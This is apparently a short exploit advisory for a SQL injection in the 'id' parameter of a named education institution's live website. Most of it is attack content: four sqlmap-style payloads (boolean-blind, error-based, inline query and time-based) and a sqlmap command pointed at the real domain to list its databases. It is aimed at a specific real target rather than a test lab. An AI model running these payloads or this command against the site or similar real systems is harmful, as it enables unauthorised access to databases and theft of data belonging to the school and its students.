# Exploit Title : Nice Education System Peshawar SQL Injection
# Author  : Ahmet Bozkurt
# Date : 23/09/2019
# Vendor Homepage : http://www.niceeducationsystem.edu.pk
# Tested On : Kali Linux
# Category : WebSite
# Exploit Risk : Medium

##############################################################################
# Exploit
/index.php?id=[SQL Injection]


Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6) AND 3391=3391 AND (4096=4096

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: id=6) AND 6970 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6970=6970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113))) AND (1245=1245

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6826=6826) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113))

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: id=6) OR 4100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2695=2695

# SQLMap

python sqlmap.py -u ""http://www.niceeducationsystem.edu.pk/index.php?id=31" --dbs

##############################################################################

Special Thanks: Jeng4L - imhatimi